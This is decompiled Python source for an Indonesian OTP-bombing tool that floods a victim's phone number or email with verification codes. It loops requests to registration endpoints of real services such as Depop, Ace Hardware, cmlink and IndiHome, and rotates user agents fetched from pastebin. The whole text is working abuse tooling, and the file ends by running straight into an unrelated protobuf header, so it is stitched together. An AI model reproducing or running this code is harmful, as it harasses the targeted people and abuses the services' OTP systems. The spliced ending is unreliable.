print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
qcr()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def bos():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 628XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
bos()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
bos()
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'Connection': 'keep-alive', 'Accept': 'application/json, text/javascript, */*; q=0.01', 'X-Requested-With': 'XMLHttpRequest', 'Save-Data': 'on', 'user-agent': '{acak}', 'referer': 'https://bos.smartlink.id/register', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.get('https://bos.smartlink.id/getOTPRegister/' + no + '/wa', headers=hd)
if 'success' in a.text:
print '\n%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
wait(120)
else:
print '\n%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
wait(120)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
bos()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def ace():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 8XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
ace()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
ace()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'Accept': '*/*', 'X-Requested-With': 'XMLHttpRequest', 'Save-Data': 'on', 'user-agent': '{acak}', 'referer': 'https://www.acehardware.co.id/membership/register', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.get('https://www.acehardware.co.id/membership/send-otp?cellphone=' + no + '&otp_type=register', headers=hd)
if 'Silahkan mencoba lagi besok' in a.text:
print '%s[%s%s%s] %sLimit 1 hari, coba lago besok%s' % (W1, R1, z, W1, W0, no)
time.sleep(1)
else:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
ace()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def bkm():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 628XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
bkm()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
bkm()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'content-length': '27', 'accept': '*/*', 'origin': 'https://nabil.my.id', 'x-requested-with': 'XMLHttpRequest', 'user-agent': '{acak}', 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 'referer': 'https://nabil.my.id/Bakmi_Otp', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://nabil.my.id/Tools/Prank-Tools/Bakmi/api.php', headers=hd, data={'nomor': no, 'jumlah': '1'})
if 'Terkirim' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
bkm()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def rp():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 628XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
rp()
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
dt = {'mobile': no, 'noise': '1583590641573155574', 'request_time': '158359064157312', 'access_token': '11111'}
data = json.dumps(dt)
r = requests.Session()
for spam in range(3):
try:
a = r.post('https://apiservice.rupiahcepatweb.com/webapi/v1/request_login_register_auth_code', headers={'accept': 'text/html, application/xhtml+xml, application/json, */*', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7', 'content-length': '166', 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 'origin': 'https://h5.rupiahcepatweb.com', 'referer': 'https://h5.rupiahcepatweb.com/dua2/pages/openPacket/openPacket.html?activityId=11&invite=200219190100215723', 'sec-fetch-dest': 'empty', 'sec-fetch-mode': 'cors', 'sec-fetch-site': 'same-site', 'user-agent': '{acak}'}, data={'data': data}).text
b = json.loads(a)['code']
if b == 0:
print '\n%s[%s*%s] %sSukses spam ke %s' % (W1, G1, W1, W0, no)
wait(60)
else:
print '\n%s[%s*%s] %sGagal spam ke %s' % (W1, R1, W1, W0, no)
wait(60)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
rp()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def kk():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 8XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
kk()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
kk()
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
r = requests.Session()
hd = {'Host': 'www.kkcoin.com', 'cache-control': 'max-age=0', 'save-data': 'on', 'upgrade-insecure-requests': '1', 'user-agent': '{acak}', 'accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.get('https://www.kkcoin.com/phone/get_phone_code?mobile_country=62&mobile=' + no + '&type=5', headers=hd)
if 'Invalid Request' in a.text:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(1)
elif 'Please try again in 1' in a.text:
print '\n%s[%s%s%s] %sTunggu 1 menit' % (W1, R1, z, W1, W0)
wait(60)
else:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(1)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
exit()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
kk()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def dp():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 8XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
dp()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
dp()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
hd = {'Content-Length': '49', 'Accept': 'application/json, text/plain, */*', 'Origin': 'https://signup.depop.com', 'Save-Data': 'on', 'User-Agent': '{acak}', 'Content-Type': 'application/json', 'Referer': 'https://signup.depop.com/', 'Accept-Encoding': 'gzip, deflate, br', 'Accept-Language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
at = {'phone_number': no, 'country_code': 'ID'}
dt = json.dumps(at)
r = requests.Session()
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.put('https://webapi.depop.com/api/auth/v1/verify/phone', headers=hd, data=dt)
if 'false' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
dp()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def kpt():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 8XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
kpt()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
kpt()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
r = requests.Session()
hd = {'content-length': '62', 'accept': 'application/json, text/javascript, */*; q=0.01', 'origin': 'https://www.kelaspintar.id', 'x-requested-with': 'XMLHttpRequest', 'save-data': 'on', 'user-agent': '{acak}', 'content-type': 'application/x-www-form-urlencoded; charset=UTF-8', 'referer': 'https://www.kelaspintar.id/', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://www.kelaspintar.id/user/otpverification', headers=hd, data={'user_mobile': no, 'otp_type': 'send_otp_reg', 'mobile_code': '+62'})
if 'successfully' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
exit()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
kpt()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def cml():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 628XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
cml()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
cml()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
r = requests.Session()
hd = {'content-length': '83', 'accept': 'application/json, text/javascript, */*; q=0.01', 'origin': 'https://global.cmlink.com', 'save-data': 'on', 'user-agent': '{acak}', 'content-type': 'application/json', 'referer': 'https://global.cmlink.com/global/pc/views/register.html', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
n = 104
at = {'accountName': no, 'accountType': n, 'serviceType': '104', 'language': '0'}
dt = json.dumps(at)
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://global.cmlink.com/aep/APP_getVerificationCode_SBO/v1', headers=hd, data=dt)
if 'success' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
exit()
y = raw_input('\n\x1b[1;37m[\x1b[1;31m!\x1b[1;37m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
cml()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def gry():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: 08XXX\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
gry()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
gry()
print
agent = requests.get('https://pastebin.com/raw/QckwZTMc').text.split('\n')
acak = random.choice(agent)
r = requests.Session()
hd = {'Connection': 'keep-alive', 'Content-Length': '23', 'Cache-Control': 'max-age=0', 'Origin': 'https://gorrygourmet.com', 'Upgrade-Insecure-Requests': '1', 'Content-Type': 'application/x-www-form-urlencoded', 'Save-Data': 'on', 'user-agent': '{acak}', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3', 'Referer': 'https://gorrygourmet.com/registration/verification-otp', 'accept-encoding': 'gzip, deflate, br', 'accept-language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
z = 0
for x in range(int(jml)):
try:
z += 1
a = r.post('https://gorrygourmet.com/register/set-otp', headers=hd, data={'phoneNumber': no})
if 'dikirimkan' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, no)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, no)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
exit()
y = raw_input('\n\x1b[1;37m[\x1b[1;31m!\x1b[1;37m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
gry()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def email():
logo()
no = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mExample: emailkorban@gmail.com\n\x1b[1;32m[\x1b[1;33m#\x1b[1;32m]\x1b[0;37m Masukkan Nomor: ')
if no == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
email()
jml = raw_input('\x1b[1;32m[\x1b[1;33m+\x1b[1;32m] \x1b[0;37mJumlah: ')
if jml == '':
print '%s[%s!%s] %sJangan kosong cok' % (W1, R1, W1, W0)
time.sleep(0.8)
email()
print
r = requests.Session()
z = 0
head = {'Connection': 'keep-alive', 'Content-Length': '39', 'Accept': '*/*', 'Origin': 'https://sobat.indihome.co.id', 'X-Requested-With': 'XMLHttpRequest', 'User-Agent': '{acak}', 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'Referer': 'https://sobat.indihome.co.id/register', 'Accept-Language': 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7'}
for x in range(int(jml)):
try:
z += 1
a = r.post('https://sobat.indihome.co.id/ajaxreg/emailGetOtp', headers=head, data={'type': 'email', 'email': mel})
if 'Kode verifikasi telah dikirim ke email Anda' in a.text:
print '%s[%s%s%s] %sSukses spam ke %s' % (W1, G1, z, W1, W0, mel)
time.sleep(10)
else:
print '%s[%s%s%s] %sGagal spam ke %s' % (W1, R1, z, W1, W0, mel)
time.sleep(10)
except requests.exceptions.ConnectionError:
print '%s[%sx%s] %sTidak ada koneksi -_-' % (W1, R1, W1, R0)
metu()
print
y = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mLagi ? (y/n): ')
if y == 'y' or y == 'Y':
email()
elif y == 'n' or y == 'N':
main2()
else:
main2()
def logo():
os.system('clear')
ketik('\n%s _____ %s__ %s_______\n| \\%s .---.-.----.| |--.%s| __|%s.-----.---.-.--------.\n%s| -- %s|%s| _ | _|| < %s|__ |%s| _ | _ | |\n%s|_____/ %s|___._|__| |__|__|%s|_______|%s| __|___._|__|__|__|\n %s|__| v0.8\n' % (G1, W1, G1, W1, G1, W1, G1, G1, W1, G1, W1, G1, W1, G1, W1, W1))
def menu():
print '%s{%s01%s} %sSpam AYO SRC\t\t%s{%s16%s} %sSpam JET\n%s{%s02%s} %sSpam Airbnb\t\t%s{%s17%s} %sSpam Depop\n%s{%s03%s} %sSpam OLX\t\t\t%s{%s18%s} %sSpam Cmlink\n%s{%s04%s} %sSpam Mister Aladin\t\t%s{%s19%s} %sSpam Sooplai\n%s{%s05%s} %sSpam Three\t\t\t%s{%s20%s} %sSpam Tiket\n%s{%s06%s} %sSpam OYO\t\t\t%s{%s21%s} %sSpam Pomona\n%s{%s07%s} %sSpam Codapay\t\t%s{%s22%s} %sSpam Payfazz\n%s{%s08%s} %sSpam MAPCLUB\t\t%s{%s23%s} %sSpam Rework\n%s{%s09%s} %sSpam Gojek\t\t\t%s{%s24%s} %sSpam Gorry\n%s{%s10%s} %sSpam Rupa Rupa\t\t%s{%s25%s} %sSpam Qikcircle\n%s{%s11%s} %sSpam Indihome\t\t%s{%s26%s} %sSpam Kkoin\n%s{%s12%s} %sSpam PHD\t\t\t%s{%s27%s} %sSpam Ace\n%s{%s13%s} %sSpam Kelas pintar\t\t%s{%s28%s} %sSpam Bakmi Gm\n%s{%s14%s} %sSpam Redbus\n%s{%s15%s} %sSpam Shopback\n%s{%s99%s} %sBack\t\t\t%s{%s00%s} %sExit' % (W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, R1, W1, R0, W1, R1, W1, R0)
def ct():
koneksi()
os.system('git pull')
time.sleep(3)
logo()
print '%s[%s1%s] %sHajar\n%s[%s2%s] %sUpdate\n%s[%s3%s] %sGet token\n%s[%s4%s] %sReport bug (Whatsapp)\n%s[%s5%s] %sAbout\n%s[%s0%s] %sExit' % (W1, C1, W1, W0, W1, C1, W1, W0, W1, C1, W1, W0, W1, C1, W1, W0, W1, C1, W1, W0, W1, R1, W1, R0)
su = ['1', '2', '3', '4', '5', '0']
wa = raw_input('\n%s\xe2\x95\x94%s[%sD4RK5H4D0W5%s]\n%s\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90%s[%sChoice%s]> %s' % (C1, W1, P1, W1, C1, W1, P1, W1, W0))
while wa not in su:
logo()
print '%s[%s1%s] %sHajar\n%s[%s2%s] %sUpdate\n%s[%s3%s] %sGet token\n%s[%s4%s] %sReport bug (Whatsapp)\n%s[%s5%s] %sAbout\n%s[%s0%s] %sExit' % (W1, C1, W1, W0, W1, C1, W1, W0, W1, C1, W1, W0, W1, C1, W1, W0, W1, C1, W1, W0, W1, R1, W1, R0)
print '\n%s[%sx%s] %sPilihan Anda salah' % (W0, R0, W0, R0)
wa = raw_input('%s\xe2\x95\x94%s[%sD4RK5H4D0W5%s]\n%s\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90%s[%sChoice%s]> %s' % (C1, W1, P1, W1, C1, W1, P1, W1, W0))
if wa == '1':
while True:
logo()
print '%s[%s#%s] %sWelcome' % (G1, Y1, G1, W0)
print '%s[%s#%s] %sKalo gak tau tokennya nya pilih menu Get token' % (G1, Y1, G1, W0)
try:
e = getpass('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mEnter Token : ')
if e == 'dark4434524b53483444305753spam':
print '\x1b[1;32m[\x1b[1;33m\xe2\x88\x9a\x1b[1;32m] \x1b[0;37mLogin success'
time.sleep(1)
break
main1()
else:
print '\x1b[1;37m[\x1b[1;31m!\x1b[1;37m] \x1b[0;37mWrong Password'
time.sleep(1)
except Exception:
print '\x1b[1;37m[\x1b[1;31m!\x1b[1;37m] \x1b[0;37mWrong Password'
time.sleep(1)
except KeyboardInterrupt:
os.system('killall -9 com.termux')
print '\x1b[1;37m[\x1b[1;31m!\x1b[1;37m] \x1b[0;37mWrong Password'
time.sleep(1)
os.system('clear')
elif wa == '2':
koneksi()
os.system('git pull')
print '%s[%s+%s] %sTools was updated. \xc2\xaf\\_(\xe3\x83\x84)_/\xc2\xaf' % (W1, P1, W1, W0)
exit()
elif wa == '3':
koneksi()
print '%s[%s*%s] %sMakasih bro dah use tool gw :)' % (W1, G1, W1, W0)
time.sleep(4)
print '%s[%s*%s] %sTunggu, Anda akan di alihkan ke browser' % (W1, G1, W1, W0)
time.sleep(3)
os.system('xdg-open https://shtlink.pw/oP9hg')
ct()
elif wa == '4':
koneksi()
logo()
time.sleep(1)
chat = raw_input('\x1b[1;32m[\x1b[1;33m#\x1b[1;32m] \x1b[0;37mEnter your message : ')
chat.replace(' ', '%20')
spin()
try:
sp.check_output(['am', 'start', 'https://api.whatsapp.com/send?phone=628996604524&text=Report : ' + chat + ''])
except:
metu()
ct()
elif wa == '5':
print '%s[%s#%s] %sAuthor : D4RK5H4D0W5\n%s[%s#%s] %sThx to : \n%s[%s#%s] %sAllah\n%s[%s#%s] %sOfficial Offensive Security Ghost\n%s[%s#%s] %sAnd you' % (G1, Y1, G1, W0, G1, Y1, G1, W0, G1, Y1, G1, W0, G1, Y1, G1, W0, G1, Y1, G1, W0)
elif wa == '0':
print
metu()
def main1():
try:
logo()
print '%s[%s1%s] %sSpam Call\n%s[%s2%s] %sSpam WA\n%s[%s3%s] %sSpam Sms\n%s[%s4%s] %sBack\n%s[%s0%s] %sExit\n' % (W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, R0)
coi = raw_input('%s\xe2\x95\x94%s[%sD4RK5H4D0W5%s]\n%s\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90%s[%sChoice%s]> %s' % (C1, W1, P1, W1, C1, W1, P1, W1, W0))
mer = ['1', '2', '3', '4', '0']
while coi not in mer:
logo()
print '%s[%s1%s] %sSpam Call\n%s[%s2%s] %sSpam WA\n%s[%s3%s] %sSpam Sms\n%s[%s4%s] %sBack\n%s[%s0%s] %sExit\n' % (W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, W0, W1, G1, W1, R0)
print '%s[%sx%s] %sPilihan Anda salah' % (W0, R1, W0, R0)
coi = raw_input('%s\xe2\x95\x94%s[%sD4RK5H4D0W5%s]\n%s\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90%s[%sChoice%s]> %s' % (C1, W1, P1, W1, C1, W1, P1, W1, W0))
if coi == '1' or coi == '01':
call()
elif coi == '2' or coi == '02':
bos()
elif coi == '3' or coi == '03':
main2()
elif coi == '4' or coi == '04':
ct()
elif coi == '0':
print
metu()
except KeyboardInterrupt:
print
metu()
def main2():
try:
logo()
menu()
no = ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13', '14', '15', '16', '17', '18', '19', '20', '21', '22', '23', '24', '25', '26', '27', '28', '29', '01', '02', '03', '04', '05', '06', '07', '08', '09', '0', '00', '99']
pilih = raw_input('\n%s\xe2\x95\x94%s[%sD4RK5H4D0W5%s]\n%s\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90%s[%sChoice%s]> %s' % (C1, W1, P1, W1, C1, W1, P1, W1, W0))
while pilih not in no:
logo()
menu()
print '\n%s[%sx%s] %sPilihan Anda salah' % (W0, R1, W0, R0)
pilih = raw_input('%s\xe2\x95\x94%s[%sD4RK5H4D0W5%s]\n%s\xe2\x95\x9a\xe2\x95\x90\xe2\x95\x90\xe2\x95\x90%s[%sChoice%s]> %s' % (C1, W1, P1, W1, C1, W1, P1, W1, W0))
if pilih == '1' or pilih == '01':
src()
elif pilih == '2' or pilih == '02':
air()
elif pilih == '3' or pilih == '03':
olx()
elif pilih == '4' or pilih == '04':
ald()
elif pilih == '5' or pilih == '05':
tri()
elif pilih == '6' or pilih == '06':
oyo()
elif pilih == '7' or pilih == '07':
coda()
elif pilih == '8' or pilih == '08':
map()
elif pilih == '9' or pilih == '09':
gojek()
elif pilih == '10':
rupa()
elif pilih == '11':
idh()
elif pilih == '12':
phd2()
elif pilih == '13':
kpt()
elif pilih == '14':
red()
elif pilih == '15':
shp()
elif pilih == '16':
jet()
elif pilih == '17':
dp()
elif pilih == '18':
cml()
elif pilih == '29':
sop()
elif pilih == '20':
tkt()
elif pilih == '21':
pmn()
elif pilih == '22':
pfz()
elif pilih == '23':
rwk()
elif pilih == '24':
gry()
elif pilih == '25':
qcr()
elif pilih == '26':
kk()
elif pilih == '27':
ace()
elif pilih == '28':
bkm()
elif pilih == '99':
main1()
elif pilih == '0' or pilih == '00':
print
metu()
except KeyboardInterrupt:
print
metu()
if __name__ == '__main__':
ct()
main1()
main2()
# Decompiled At : Wed Apr 1 13:27:38 2020
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: vector.proto
"""Generated protocol buffer code."""
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
DESCRIPTOR = _descriptor.FileDescriptor(
name='vector.proto',
package='robotics.messages',
syntax='proto3',
serialized_options=b'\370\001\001',
create_key=_descriptor._internal_create_key,
